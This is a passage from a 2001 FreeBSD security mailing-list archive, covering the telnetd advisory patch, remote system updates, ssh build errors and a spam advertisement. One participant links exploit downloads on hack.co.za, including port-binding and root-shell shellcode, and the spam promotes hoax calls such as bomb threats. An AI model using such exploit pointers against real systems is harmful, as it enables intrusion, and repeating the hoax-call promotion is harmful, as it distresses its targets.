ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd-crypto.patch.asc /* This patch applies cleanly to 3.5.1-STABLE systems, and the above directory exists. */ # cd /usr/src/ # patch -p < /path/to/patch # cd /usr/src/secure/libexec/telnetd # make depend && make all install /* This directory does NOT exist, only /usr/src/libexec/telnetd exists in 3.5.1-Stable */ 2b) For systems without the crypto-telnet sources installed Download the patch and the detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd.patch.asc # cd /usr/src/ # patch -p < /path/to/patch # cd /usr/src/libexec/telnetd # make depend && make all install /* Yet this command appears to build the telnet daemon with the applied patches. Can someone confirm this for me? For what it's worth, the above advisory confused me, so I simply re-cvsupped my entire source tree, and then followed the instructions immediately above. */ Perchance a correction can save someone else the same trouble. -Dan mahoney -- "Don't be so depressed dear." "I have no endorphins, what am I supposed to do?" -DM and SK, February 10th, 1999 --------Dan Mahoney-------- Techie, Sysadmin, WebGeek Gushi on efnet/undernet IRC ICQ: 13735144 AIM: LarpGM Web: http://prime.gushi.org finger danm@prime.gushi.org for pgp public key and tel# --------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 6:52:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from cvd.pl (cvd.pl [213.25.82.2]) by hub.freebsd.org (Postfix) with ESMTP id 008AB37B405 for ; Thu, 26 Jul 2001 06:52:15 -0700 (PDT) (envelope-from gdef@cvd.pl) Received: by cvd.pl (Postfix, from userid 1005) id 3880F13FB1D; Thu, 26 Jul 2001 15:54:00 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by cvd.pl (Postfix) with ESMTP id 1F858F6123; Thu, 26 Jul 2001 15:54:00 +0200 (CEST) Date: Thu, 26 Jul 2001 15:54:00 +0200 (CEST) From: "Janusz Mucka (Defacto)" To: Markus =?iso-8859-1?Q?Hallstr=F6m?= Cc: Nuno Teixeira , Subject: Re: Updating security fixes without single user mode? In-Reply-To: <5.0.2.1.2.20010726030631.04de4ec0@students.su.se> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-2 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 26 Jul 2001, Markus [iso-8859-1] Hallstr=F6m wrote: > At 01:57 2001-07-26 +0100, Nuno Teixeira wrote: > >Hello to all, > > > >At my workstation I'm tracking STABLE with no problems. > > > >At my server I just want to update the system with security fixes, etc. > > > >My question is: > > > >Tracking RELEASE_4_3 (for a RELEASE 4.3 system) is a good option, but > >after makeworld and makekernel, I need to > >go into single user mode and make installworld and mergemaster. > > > >The problem is that my server is at US and I live in Portugal! So, it's > >impossible to run > >the system in single user mode. > > > >What is the best way of maintain the system updated without single user = mode? > > > >Patches? Packages? > > > >Thanks in advance, > > You can always be a daredevil and make installworld and run mergemaster i= n > multiusermode, It usually works for me ;-) > > /TUBBS > > Look at this: /usr/src/Makefile # buildworld - Rebuild *everything*, including glue to help do # upgrades. # installworld - Install everything built by "buildworld". # world - buildworld + installworld. make world =3D make buildworld + make installworld Defacto To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 7: 7: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from federation.addy.com (addy.com [208.11.142.20]) by hub.freebsd.org (Postfix) with ESMTP id 3A5B137B401 for ; Thu, 26 Jul 2001 07:07:01 -0700 (PDT) (envelope-from jim@federation.addy.com) Received: from localhost (jim@localhost) by federation.addy.com (8.9.3/8.9.3) with ESMTP id KAA24396 for ; Thu, 26 Jul 2001 10:06:38 -0400 (EDT) (envelope-from jim@federation.addy.com) Date: Thu, 26 Jul 2001 10:06:38 -0400 (EDT) From: Jim Sander Cc: FreeBSD Security Subject: Re: Telnet exploit & 3.4-RELEASE In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org With all the trouble people seem to be having with this issue- let me run this by people more "in the know" and see if they think it is likely to fix things at all... 1) built up a "new" 3.x box locally, and installed the source (my production boxes don't have full source) 2) applied the patch and built the new telnetd (it's 2K smaller than the original, so I know *something* changed) 3) copied the binary over to the production systems "manually." 4) restarted inetd Telnet definitely functions, and the exploit doesn't seem to succeed- but then it didn't work before either, so who knows for sure. (I'm probably just using it improperly) It seems to me that this should confuse at least the basest script-kiddies, and really that's what I'm most worried about. The patch seems to involve only telnetd iteself, so my gut says I'm golden. (or at least bronzed) Comments? -=Jim=- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 7:46:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id EFDFE37B401 for ; Thu, 26 Jul 2001 07:46:11 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from HP2500B (localhost.veldy.net [127.0.0.1]) by veldy.net (Postfix) with SMTP id 24AEABAA8; Thu, 26 Jul 2001 09:46:10 -0500 (CDT) Message-ID: <00f201c115e1$8daee9c0$3028680a@tgt.com> From: "Thomas T. Veldhouse" To: "Vladimir Terziev" Cc: References: <200107260732.f6Q7Wrc36388@star.rila.bg> Subject: Re: Compilation problem with ssh-3.0.1 on FreeBSD 4.3-STABLE box Date: Thu, 26 Jul 2001 09:45:02 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The error you got would have been nice, if not darn useful. Anyway, I just compiled it without incident. I use a bash shell. I set CFLAGS to "-O -pipe -march=i686". I configured as follows: ./configure --with-threads --without-ipv6 --with-etcdir=/usr/local/etc/ssh - -prefix=/usr/local I then used gmake to build. I did not install it as I use OpenSSH and am fine with it. Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: "Vladimir Terziev" To: Sent: Thursday, July 26, 2001 2:32 AM Subject: Compilation problem with ssh-3.0.1 on FreeBSD 4.3-STABLE box > > Hi all, > > I've downloaded a copy of ssh-3.0.1 from ftp.ssh.com. I've tryed to compile > it but I've got an error. > > Has anybody succeeded to compile ssh-3.0.1 (ssh from ssh.com) ? > > regards, > > > Vladimir > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 10:22:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhub.airlinksys.com (mailhub.airlinksys.com [216.70.12.6]) by hub.freebsd.org (Postfix) with ESMTP id 2F58C37B407 for ; Thu, 26 Jul 2001 10:22:34 -0700 (PDT) (envelope-from sjohn@airlinksys.com) Received: from sjohn.airlinksys.com (sjohn.airlinksys.com [216.70.12.7]) by mailhub.airlinksys.com (Postfix) with ESMTP id 7B3D353510 for ; Thu, 26 Jul 2001 12:22:25 -0500 (CDT) Received: by sjohn.airlinksys.com (Postfix, from userid 1000) id 28B265DE4; Thu, 26 Jul 2001 12:22:25 -0500 (CDT) Date: Thu, 26 Jul 2001 12:22:25 -0500 From: Scott Johnson To: freebsd-security@FreeBSD.ORG Subject: Re: [Q] distribution of patched binaries for security fixes. Message-ID: <20010726122225.A59848@sjohn.airlinksys.com> Reply-To: Scott Johnson Mail-Followup-To: freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from David_May@allsolutions.com.au on Thu, Jul 26, 2001 at 06:47:21PM +0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Quoth David_May@allsolutions.com.au on Thu, Jul 26, 2001 at 06:47:21PM +0800: > > > Hello, I am setting up a FreeBSD machine to track the STABLE branch > and to rebuild the system from time-to-time. The main reason being to > keep track of security related fixes and enhancents.The documentation > covers that quite well. > > But I was wondering what is a good procedure to distribute updated > binaries to other machines. I several have production machines that I > would like to keep up-to-date but do not want to compile source on > every machine. > > Being able to create something like a Windows NT service pack > would be nice :) I just mount /usr/src and /usr/obj read-only from the build machine, and install. For kernels, I mount /usr/src only, and build on the target. If you follow RELENG_4_3 (4.3-RELEASE + security fixes) your life gets much easier -- no more building world. Just cvsup, build the affected systems (follow the steps in the security notification), and install on every machine build_machine# cvsup -g -L 2 supfile build_machine# rm -rf /usr/obj/usr/ build_machine# cd /usr/src/affected_component build_machine# make depend && make all install target_machine# mount -t nfs build_machine:/usr/src /usr/src target_machine# mount -t nfs build_machine:/usr/obj /usr/obj target_machine# cd /usr/src/affected_component target_machine# make install If you have a lot of machines to update, rdist + ssh may simplify things further, transferring binaries and killing and restarting daemons, etc. These are production machines, right? Why do you want to track -STABLE, building and installing world all the time? If it ain't broke, don't fix it! -- Scott Johnson System/Network Administrator Airlink Systems To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 13: 3:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id AC6AF37B406; Thu, 26 Jul 2001 13:03:49 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 8BB096722E; Thu, 26 Jul 2001 13:03:48 -0700 (PDT) Date: Thu, 26 Jul 2001 13:03:48 -0700 From: Kris Kennaway To: "Dan Mahoney, System Admin" Cc: security@freebsd.org, security-officer@freebsd.org Subject: Re: Mistake in security advisory. Message-ID: <20010726130347.A49735@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="huq684BweRXVnRxX" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from danm@prime.gushi.org on Thu, Jul 26, 2001 at 09:19:20AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --huq684BweRXVnRxX Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jul 26, 2001 at 09:19:20AM -0400, Dan Mahoney, System Admin wrote: > # cd /usr/src/ > # patch -p < /path/to/patch > # cd /usr/src/secure/libexec/telnetd > # make depend && make all install >=20 > /* This directory does NOT exist, only /usr/src/libexec/telnetd exists in > 3.5.1-Stable */ Sounds like you're not cvsupping the src-secure collection, then. > # cd /usr/src/ > # patch -p < /path/to/patch > # cd /usr/src/libexec/telnetd > # make depend && make all install >=20 > /* Yet this command appears to build the telnet daemon with the applied > patches. Can someone confirm this for me? For what it's worth, the > above advisory confused me, so I simply re-cvsupped my entire source > tree, and then followed the instructions immediately above. */ This builds the non-crypto version; as I tried to explain in the advisory, there are two slightly different versions in the tree. Kris --huq684BweRXVnRxX Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7YHejWry0BWjoQKURAlFCAJ0S7/VlqXmLxFzPzhZT/qkMO3dqRACfeyMh iWUTOzU2MO6Hs49Qa91+e1I= =pxrm -----END PGP SIGNATURE----- --huq684BweRXVnRxX-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 13:53:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from salvation.unixgeeks.com (cc784475-b.scrmnt1.ca.home.com [65.5.73.160]) by hub.freebsd.org (Postfix) with SMTP id 656BB37B407 for ; Thu, 26 Jul 2001 13:53:08 -0700 (PDT) (envelope-from nathan@salvation.unixgeeks.com) Received: (qmail 51586 invoked by uid 1001); 26 Jul 2001 20:34:53 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 26 Jul 2001 20:34:53 -0000 Date: Thu, 26 Jul 2001 13:34:53 -0700 (PDT) From: nathan barrick To: Cc: Subject: ssh3 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i downloaded ssh-3.0.1.tar.gz from ssh.com. i configure/make and everythign works fine. no errors. but.. if i try to run the ssh client i get this error. Received signal 11. (no core) any ideas? i can ssh in to the box so i know the daemon still works. but i can't get the client to work. i've checked on the soft links to make sure everything is working properly and that it is all going in the right direction. everything seems to be. if you have any ideas they'd be greatly appreciated. nathan. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 14:13:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from prime.gushi.org (prime.gushi.org [208.23.118.172]) by hub.freebsd.org (Postfix) with ESMTP id F3B4337B408; Thu, 26 Jul 2001 14:13:50 -0700 (PDT) (envelope-from danm@prime.gushi.org) Received: from localhost (danm@localhost) by prime.gushi.org (8.11.3/8.11.3) with ESMTP id f6QLATC17172; Thu, 26 Jul 2001 17:10:34 -0400 (EDT) Date: Thu, 26 Jul 2001 17:10:28 -0400 (EDT) From: "Dan Mahoney, System Admin" To: Kris Kennaway Cc: security@freebsd.org, security-officer@freebsd.org Subject: Re: Mistake in security advisory. In-Reply-To: <20010726130347.A49735@xor.obsecurity.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 26 Jul 2001, Kris Kennaway wrote: > On Thu, Jul 26, 2001 at 09:19:20AM -0400, Dan Mahoney, System Admin wrote: > > > # cd /usr/src/ > > # patch -p < /path/to/patch > > # cd /usr/src/secure/libexec/telnetd > > # make depend && make all install > > > > /* This directory does NOT exist, only /usr/src/libexec/telnetd exists in > > 3.5.1-Stable */ > > Sounds like you're not cvsupping the src-secure collection, then. From the supfile: # These are the individual collections that make up FreeBSD's crypto # collection. They are no longer export-restricted and are a part of # src-all #src-crypto #src-secure #src-sys-crypto Unless for some reason I should be using the stable-secure-supfile -Dan > > > # cd /usr/src/ > > # patch -p < /path/to/patch > > # cd /usr/src/libexec/telnetd > > # make depend && make all install > > > > /* Yet this command appears to build the telnet daemon with the applied > > patches. Can someone confirm this for me? For what it's worth, the > > above advisory confused me, so I simply re-cvsupped my entire source > > tree, and then followed the instructions immediately above. */ > > This builds the non-crypto version; as I tried to explain in the > advisory, there are two slightly different versions in the tree. > > Kris > -- I want to see how you see. -SK, 6/2/99, 4:30 AM --------Dan Mahoney-------- Techie, Sysadmin, WebGeek Gushi on efnet/undernet IRC ICQ: 13735144 AIM: LarpGM Web: http://prime.gushi.org finger danm@prime.gushi.org for pgp public key and tel# --------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 14:14:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from windupline.co.uk (ppp-1-65.cvx5.telinco.net [212.1.152.65]) by hub.freebsd.org (Postfix) with SMTP id 09DA537B40A for ; Thu, 26 Jul 2001 14:14:03 -0700 (PDT) (envelope-from myp@windupline.co.uk) From: "John" To: "recipient"@FreeBSD.ORG, list@windupline.co.uk Subject: Have a good laugh! Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 26 Jul 2001 22:13:48 +0100 Reply-To: "John" X-Priority: 1 (Highest) Content-Transfer-Encoding: 8bit Message-Id: <20010726211403.09DA537B40A@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Wind-up A Friend, Colleague, Relative Or Even An Enemy -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Call Windupline and you'll be in stitches! With our new service you're able to wind-up, confuse and bemuse people with a choice of bogus callers that you can transfer to your victim on any UK landline or mobile and then listen in to the call and hear their reaction Don't worry though, they won't be able to hear you, nor tell that you made the call - try it on a speaker phone and a group can hear -~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~- Just use the easy to follow recipe: -~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~- (i) choose one ripe victim (ii) add Windupline by dialling 0906 736 9265 and select 1 - Wind-up samples 2 - Mr Angry 3 - The Irate Delivery Driver 4 - An Invite To No 10 5 - There's A Bomb In Your Street 6 - You're Wanted At The Police Station 7 - The Tax Inspector 8 - You've Got My Daughter Pregnant (iii) enter your victims number and wait for the transfer (iv) when they answer, prepare yourself and ...enjoy! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- This has got to be the funniest way to wind-up anyone -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- http://www.windupline.co.uk Windupline BCM 1543 London WC1N 3XX United Kingdom Tel: +44 (0)8707 469024 -~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~- Calls to 0906 numbers are charged at Ģ1/min at all times Maximum call duration 5 mins, average 2 mins Please ensure you have the permission of the bill payer before calling -~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~- You've received this email as you're on our mailing list If however, you do not wish to receive any further emails simply mailto:remove@windupline.co.uk with the email address(es) to be removed inserted in the subject line Windupline is a trading name of Portmead UK Ltd who are registered and operate under UK data protection legislation We will honour all remove requests -~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~- Portmead UK Ltd 27 Old Gloucester Street London WC1N 3AF United Kingdom Registered in England & Wales 3798100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 14:46:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from mg.hk5.outblaze.com (202-123-209-152.outblaze.com [202.123.209.152]) by hub.freebsd.org (Postfix) with ESMTP id 9248937B401 for ; Thu, 26 Jul 2001 14:46:43 -0700 (PDT) (envelope-from jian@linuxmail.org) Received: from ws4.us.outblaze.com (ws4.us.outblaze.com [209.249.164.192]) by mg.hk5.outblaze.com (8.11.2/8.11.2) with SMTP id f6QLkgU17575 for ; Thu, 26 Jul 2001 21:46:42 GMT Received: (qmail 18022 invoked by uid 1001); 26 Jul 2001 21:46:41 -0000 Message-ID: <20010726214641.18021.qmail@linuxmail.org> Content-Type: text/plain; charset="iso-8859-1" Content-Disposition: inline Content-Transfer-Encoding: 7bit Mime-Version: 1.0 X-Mailer: MIME-tools 4.104 (Entity 4.117) Received: from ws4.us.outblaze.com for [210.237.173.114] via web-mailer on Fri, 27 Jul 2001 05:46:41 +0800 From: "jianzhong ren" To: FreeBSD Security Date: Fri, 27 Jul 2001 05:46:41 +0800 Subject: some new exploit is out Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i just want to let you know that new expoit is out for freebsd in http://www.hack.co.za/ i know that pacth for telnet is out too, but is there any new patch for shared signals vulnerability adn portbinding shellcode? thank you -- Get your free email from www.linuxmail.org Powered by Outblaze To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 14:53: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 2355C37B401 for ; Thu, 26 Jul 2001 14:53:00 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 3985067226; Thu, 26 Jul 2001 14:52:59 -0700 (PDT) Date: Thu, 26 Jul 2001 14:52:58 -0700 From: Kris Kennaway To: jianzhong ren Cc: FreeBSD Security Subject: Re: some new exploit is out Message-ID: <20010726145258.A78877@xor.obsecurity.org> References: <20010726214641.18021.qmail@linuxmail.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="J/dobhs11T7y2rNN" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010726214641.18021.qmail@linuxmail.org>; from jian@linuxmail.org on Fri, Jul 27, 2001 at 05:46:41AM +0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --J/dobhs11T7y2rNN Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Fri, Jul 27, 2001 at 05:46:41AM +0800, jianzhong ren wrote: > i know that pacth for telnet is out too, but is there any new patch > for shared signals vulnerability Yes, a while ago. You do read advisories, right? > adn portbinding shellcode? What's this one? Kris --J/dobhs11T7y2rNN Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7YJE6Wry0BWjoQKURAq+7AKD6k9aL7gwAHxw2strKpu0M4VgTAwCfbT5U MtLBMhsA+tUjkacMxTtk5Kk= =apZe -----END PGP SIGNATURE----- --J/dobhs11T7y2rNN-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 14:54: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from lass.merseine.nu (unknown [200.165.5.160]) by hub.freebsd.org (Postfix) with ESMTP id A597F37B401 for ; Thu, 26 Jul 2001 14:53:48 -0700 (PDT) (envelope-from fastjack@lass.merseine.nu) Received: (from fastjack@localhost) by lass.merseine.nu (8.11.4/8.11.4) id f6OHLlI16938 for security@freebsd.org; Tue, 24 Jul 2001 14:21:47 -0300 (BRT) (envelope-from fastjack) Date: Tue, 24 Jul 2001 14:21:46 -0300 From: Danilo Castro To: security@freebsd.org Subject: Re: telnetd remote root exploit released Message-ID: <20010724142146.A15574@lass.merseine.nu> References: <5.1.0.14.0.20010724124021.078d1ec0@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from wade@ezri.org on Tue, Jul 24, 2001 at 12:54:26 -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Wade! On Tue, 24 Jul 2001, Wade Majors wrote: > This is the same one we are all patched against now, right? > > -Wade If you updated yer telnetd, yes. The same we are patched aginst now. []s kobold To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 14:58:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from mg.hk5.outblaze.com (202-123-209-152.outblaze.com [202.123.209.152]) by hub.freebsd.org (Postfix) with ESMTP id 13D9D37B401 for ; Thu, 26 Jul 2001 14:58:51 -0700 (PDT) (envelope-from jian@linuxmail.org) Received: from ws4.us.outblaze.com (ws4.us.outblaze.com [209.249.164.192]) by mg.hk5.outblaze.com (8.11.2/8.11.2) with SMTP id f6QLwmU21327 for ; Thu, 26 Jul 2001 21:58:49 GMT Received: (qmail 18999 invoked by uid 1001); 26 Jul 2001 21:58:48 -0000 Message-ID: <20010726215848.18998.qmail@linuxmail.org> Content-Type: text/plain; charset="iso-8859-1" Content-Disposition: inline Content-Transfer-Encoding: 7bit Mime-Version: 1.0 X-Mailer: MIME-tools 4.104 (Entity 4.117) Received: from ws4.us.outblaze.com for [210.237.173.114] via web-mailer on Fri, 27 Jul 2001 05:58:48 +0800 From: "jianzhong ren" To: kris@obsecurity.org Cc: FreeBSD Security Date: Fri, 27 Jul 2001 05:58:48 +0800 Subject: Re: some new exploit is out Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----Original Message----- From: Kris Kennaway <kris@obsecurity.org> Date: Thu, 26 Jul 2001 14:52:58 -0700 To: jianzhong ren <jian@linuxmail.org> Subject: Re: some new exploit is out > On Fri, Jul 27, 2001 at 05:46:41AM +0800, jianzhong ren wrote: > > > i know that pacth for telnet is out too, but is there any new patch > > for shared signals vulnerability > > Yes, a while ago. You do read advisories, right? > > > adn portbinding shellcode? > > What's this one? http://www.hack.co.za/download.php?sid=1444 that for portbinding shellcode(86 bytes) > > Kris > -- Get your free email from www.linuxmail.org Powered by Outblaze To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 15: 0:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from mg.hk5.outblaze.com (202-123-209-152.outblaze.com [202.123.209.152]) by hub.freebsd.org (Postfix) with ESMTP id 9D57A37B403 for ; Thu, 26 Jul 2001 15:00:35 -0700 (PDT) (envelope-from jian@linuxmail.org) Received: from ws4.us.outblaze.com (ws4.us.outblaze.com [209.249.164.192]) by mg.hk5.outblaze.com (8.11.2/8.11.2) with SMTP id f6QM0YU21605 for ; Thu, 26 Jul 2001 22:00:34 GMT Received: (qmail 19130 invoked by uid 1001); 26 Jul 2001 22:00:33 -0000 Message-ID: <20010726220033.19129.qmail@linuxmail.org> Content-Type: text/plain; charset="iso-8859-1" Content-Disposition: inline Content-Transfer-Encoding: 7bit Mime-Version: 1.0 X-Mailer: MIME-tools 4.104 (Entity 4.117) Received: from ws4.us.outblaze.com for [210.237.173.114] via web-mailer on Fri, 27 Jul 2001 06:00:33 +0800 From: "jianzhong ren" To: kris@obsecurity.org Cc: FreeBSD Security Date: Fri, 27 Jul 2001 06:00:33 +0800 Subject: Re: some new exploit is out Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----Original Message----- From: Kris Kennaway <kris@obsecurity.org> Date: Thu, 26 Jul 2001 14:52:58 -0700 To: jianzhong ren <jian@linuxmail.org> Subject: Re: some new exploit is out > On Fri, Jul 27, 2001 at 05:46:41AM +0800, jianzhong ren wrote: > > > i know that pacth for telnet is out too, but is there any new patch > > for shared signals vulnerability > > Yes, a while ago. You do read advisories, right? > > > adn portbinding shellcode? > > What's this one? > > Kris and this http://www.hack.co.za/download.php?sid=1445 for setreuid(0,0) execve /bin/sh shellcode(29 bytes) > -- Get your free email from www.linuxmail.org Powered by Outblaze To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 15: 1:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 77B5037B405; Thu, 26 Jul 2001 15:01:06 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 9DC6867226; Thu, 26 Jul 2001 15:01:05 -0700 (PDT) Date: Thu, 26 Jul 2001 15:01:04 -0700 From: Kris Kennaway To: "Dan Mahoney, System Admin" Cc: Kris Kennaway , security@freebsd.org, security-officer@freebsd.org Subject: Re: Mistake in security advisory. Message-ID: <20010726150104.A79340@xor.obsecurity.org> References: <20010726130347.A49735@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="3MwIy2ne0vdjdPXF" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from danm@prime.gushi.org on Thu, Jul 26, 2001 at 05:10:28PM -0400 Sender: 